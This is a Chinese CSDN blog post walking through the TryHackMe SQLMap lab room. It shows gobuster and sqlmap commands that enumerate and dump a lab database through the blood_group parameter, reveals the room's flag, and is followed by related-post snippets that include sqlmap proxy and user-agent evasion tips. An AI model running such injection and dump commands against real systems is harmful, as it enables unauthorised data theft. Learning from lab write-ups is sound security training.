Tryhackme-SQLMap Challenge练习

最新推荐文章于 2024-11-04 22:38:56 发布
最新推荐文章于 2024-11-04 22:38:56 发布
阅读量344 收藏 5
点赞数 7
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74606212/article/details/135769043
版权

本文相关的TryHackMe实验练习房间链接:TryHackMe | SQLMAP

拿到ip先nmap扫一下 

顺便扫个目录

gobuster dir -u 10.10.158.46 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

 

访问http://10.10.158.46/blood/

看不懂英语思密达...

不出意外search肯定有东西

我们bp抓包试试

不出意外blood_group是易受攻击的参数 

cat查看一下 

接下来就开始正题了

sqlmap -r test.txt -p blood_group --batch --current-user

简单解释一下:-r用于读取文件,-p用于提供易受攻击的参数,--batch表示测试过程中, 执行所有默认配置,--current-user检索DBMS当前用户   

 爆破数据库

sqlmap -r test.txt -p blood_group --batch --dbs

我们先尝试爆破blood表

sqlmap -r test.txt -p blood_group --batch -D blood --tables

 接下来就是拿flag了

sqlmap -r test.txt -p blood_group --batch --dump -D blood -T flag

拿到flag:thm{sqlm@p_is_L0ve}

orzw
关注
sqlmapproject-sqlmap-1.4.8-11-ga42ec7d.zip
08-20
SQLMap工具详解——以sqlmapproject-sqlmap-1.4.8-11-ga42ec7d.zip为例》 SQLMap是一款强大的、自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,它能够帮助安全研究人员或者渗透测试者识别并利用网站应用...
sqlmapproject-sqlmap-1.5.10-10-ge9d7a77.zip
10-08
sqlmapproject-sqlmap-1.5.10-10-ge9d7a77.zip
网络安全-sqlmap学习笔记
关注网络安全、云原生安全
06-08 6802
介绍 检测和利用SQL注入的工具。 命令参数 参数解释 参数 含义 描述 -h,--help 帮助 显示基本帮助消息并退出 -hh 高级帮助 显示高级帮助消息并退出 --version 版本 显示程序的版本号并退出 -u,-url=URL URL 目标URL(例如“ http://www.site.com/vuln.php?id=1”) -d DIRECT 连接字符串,用于数据库直接连接 -l .
注入神器-----SqlMap的使用
weixin_54227009的博客
05-28 1418
sqlmap GET参数: -u 网址 --dbs:获取注入点的所有数据库 -D:指定数据库 --tables:获取指定的表 -T:表名 --columns:获取表的指定字段 -C:获取指定字段 --dump:把数据打印出来 POST注入: 先抓包, 注入点的位置打个*号 然后保存为txt文档 -r 指定的文档 --dbs:获取注入点的所有数据库 --level=3,注入级别默认为1,为三的话注入能力加强一点 --current-db:获取当前数据库 sqlmap获取sh...
注入工具 -- sqlmap(检索DBMS信息)
weixin_41489908的博客
12-20 1208
自从你删了我以后,我看了一年五个月的资料,时隔一年五个月,你突然出现在我的访客里,我呆坐了一夜,笑着哭,哭着笑,瞒着所有人我还是很喜欢你。。。 一、sqlmap检索DBMS Banner –banner或者-b sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” -b 二、sqlmap检索DBMS当前用户 sqlmap -u “http://19...
23-sqlmap的--level和--risk的区别
m0_62207482的博客
03-27 1520
而risk则是风险系数,默认是1会测试大部分的测试语句,2会增加基于事件的测试语句,3会 增加OR语句的QL注入测试。在有些时候,例如在UPDATE的语句中,注入一个OR的测试语句, 可能导致更新的整个表,可能造成很大的风险。level级别越高发送的请求越多,并且在level3以上时会尝试对referer注入。
SQL注入工具-----sqlmap
追求卓越,技术流~
10-25 3768
合天网安笔记 利用sqlmap进行文件的读写 简介:sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post ,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 第一步:首先设置好靶机 打开http:10.1.1.136,输入用户名:admin 密码:password 登入 找到SQL Injection随意输入一个数,打开burpsuite进行抓包,点
Kali-工具-sqlmap常见用法
weixin_44257023的博客
07-19 2981
Kali-工具-sqlmap常见用法
注入神器 --SQLMAP使用示例
Kevin's Blog
04-20 2411
文章目录输出结果详细程度 输出结果详细程度 -v (控制sqlmap结果输出的详细程度,7个级别,默认为1) 0,仅显示回溯,错误和严重信息 1,显示警告信息 2,显示调试信息 3,显示注入的有效载荷 4,显示HTTP请求 5,显示HTTP响应的标头 6,显示HTTP响应的页面内容 ...
网络安全-sqlmap注意项及高级使用
关注网络安全、云原生安全
07-12 2266
注意项 ip隐藏 跑一些python脚本获取免费ip代理,或者购买稳定的ip代理 --proxy=http://112.84.54.169:9999 UserAgent隐藏 参数:-A="你的UserAgent" 或者--random-agent 高级使用
SQL注入神器---SqlMap
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
01-12 1031
一、SQLmap简介 Sqlmap是一个有python编写的开源渗透工具,用于SQL漏洞检测,是一款功能强大的Sql注入漏洞利用工具。 可以检测的数据类型众多,包括:access、mssql、mysql、Oracle、postgraSql、sqlite等。 可以进行类型众多的注入利用,包括Sql盲注、union注入、报错注入、延时注入、cookie注入等。 其他功能:命令执行、枚举用户、检测权限、自动破解等。 二、Sqlmap的参数 1、基础参数 -h:查看帮助 –is-dba:查看用户权限 –dbs:.
ibatis-sqlmap-2.3.4.726-sources.jar.zip_birth84v_cutting1v2_ibat
09-20
首先,我们来看标题中的"ibatis-sqlmap-2.3.4.726-sources.jar.zip_birth84v_cutting1v2_ibat"。这部分信息表明我们正在探讨的是iBatis SQLMap的2.3.4.726版源码,其中"birth84v"和"cutting1v2"可能是特定的版本标识...
sqlmapproject-sqlmap-1.3.6-50-ge355a08.zip
06-26
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection ...
sqlmapproject-sqlmap-1.4.7-4-g67f918f.zip防SQL注入工具
12-06
【标题】"sqlmapproject-sqlmap-1.4.7-4-g67f918f.zip"是一个著名的开源SQL注入检测工具——SqlMap的特定版本。SqlMap是一个自动化工具,专为安全研究人员和渗透测试人员设计,用于检测和利用SQL注入漏洞。它的目标...
ICT网络赛道安全考点知识总结4
m0_72765822的博客
11-04 474
RADIUS和HWTACACS协议通常都使用共享密钥对传输的用户信息进行加密,以确保安全传输。 用来封装EAP报文的RADIUS属性通常是"EAP-Message",它用于传输EAP认证过程中的消息。 LDAP的域名属性通常是"DC"(Domain Component),用于表示域名的组成部分。 BFD(Bidirectional Forwarding Detection)可以用于检测网络设备之间直连物理链路的双向转发路径的故障,但也可以用于检测其他类型的链路故障。 管理员为虚拟系统手工分配资源时,
【基于LSM的ELF文件安全模块设计】参考
weixin_50947533的博客
11-04 439
本设计致力于通过 Linux 安全模块(LSM)构建一个强大而严密的安全防护体系,以实现对 ELF 文件(涵盖可执行文件和动态链接库)的绝对严格的合法性和完整性检查。其核心目标在于确保系统在加载和运行各类 ELF 文件时,能够有效抵御来自未知来源或被恶意篡改的文件所可能带来的严重安全威胁,如数据泄漏、系统崩溃等,进而全力维护系统的高度稳定性和数据的绝对安全性。
国标GB28181网页直播平台EasyGBS国标GB28181软件的应急管理与安全生产解决方案
EasyGBS的博客
11-04 282
EasyGBS作为国标GB28181协议的视频融合管理平台,能够实现全天候、稳定的安防监控,加强事件预防、应急处理和事后追责,缩短信息传递时间,构建覆盖市、县的纵向网络,并与相关单位联通。
高级Python自动化运维:容器安全与网络策略的深度解析
最新发布
weixin_52392194的博客
11-04 796
网络策略是用来定义Pod间通信的规则。通过制定网络策略,可以限制特定Pod的入站和出站流量。Kubernetes中的NetworkPolicy是实现这一目标的主要工具。
MyBatis-Plus条件构造器:构建安全、高效的数据库查询
qq_17153885的博客
11-04 575
MyBatis-Plus 提供了一套强大的条件构造器(Wrapper),用于构建复杂的数据库查询条件。
iBATIS-SQLMap快速入门与配置详解
- 开发者使用XML文件定义SQL Map,其中包含了`<sqlMap>`元素,它包含多个`<mappedStatement>`元素,每个映射对应一条SQL查询。 - Java程序通过调用预定义的方法或接口执行这些映射,框架会根据映射规则动态生成并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值